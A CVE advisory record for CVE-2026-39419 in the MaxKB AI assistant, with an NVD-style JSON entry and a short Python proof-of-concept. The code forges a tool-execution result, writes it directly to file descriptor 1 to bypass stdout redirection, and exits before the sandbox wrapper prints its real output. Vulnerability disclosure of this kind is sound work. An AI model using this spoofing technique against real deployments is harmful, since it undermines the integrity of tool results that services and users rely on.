CVE-2026-39419

import sys import os # Step 1: Frame introspection to extract wrapper UUID from bytecode constants # In a real scenario, the attacker iterates through frame.f_code.co_consts # or inspects the calling frame's locals to find the validation token. frame = sys._getframe(1) # Assuming validation logic relies on a specific context found via introspection # Step 2: Construct the forged result payload # This payload mimics the expected format of a legitimate tool execution result. forged_payload = b'{"result": "pwned", "uuid": "extracted_uuid_value"}' # Step 3: Bypass stdout redirection by writing directly to File Descriptor 1 # The wrapper redirects sys.stdout, but os.write(1, ...) communicates directly with the kernel. os.write(1, forged_payload) # Step 4: Terminate the process before the wrapper prints the legitimate output # This ensures the service only sees the spoofed data. sys.exit(0)

{"cve": {"id": "CVE-2026-39419", "sourceIdentifier": "[email protected]", "published": "2026-04-14T02:16:05.143", "lastModified": "2026-04-20T17:32:17.920", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "MaxKB is an open-source AI assistant for enterprise. In versions 2.7.1 and below, an authenticated user can bypass sandbox result validation and spoof tool execution results by exploiting Python frame introspection to read the wrapper's UUID from its bytecode constants, then writing a forged result directly to file descriptor 1 (bypassing stdout redirection). By calling sys.exit(0), the attacker terminates the wrapper before it prints the legitimate output, causing the MaxKB service to parse and trust the spoofed response as the genuine tool result. This issue has been fixed in version 2.8.0."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:N/I:L/A:N", "baseScore": 3.1, "baseSeverity": "LOW", "attackVector": "NETWORK", "attackComplexity": "HIGH", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 1.6, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-74"}, {"lang": "en", "value": "CWE-290"}, {"lang": "en", "value": "CWE-693"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:maxkb:maxkb:*:*:*:*:-:*:*:*", "versionEndExcluding": "2.8.0", "matchCriteriaId": "8BB376B6-4E9C-4801-9D33-5BF858C857D2"}]}]}], "references": [{"url": "https://github.com/1Panel-dev/MaxKB/commit/38c4cfecd065293ede0437f6fa76cf0116591d25", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://github.com/1Panel-dev/MaxKB/releases/tag/v2.8.0", "source": "[email protected]", "tags": ["Release Notes"]}, {"url": "https://github.com/1Panel-dev/MaxKB/security/advisories/GHSA-f3c8-p474-xwfv", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}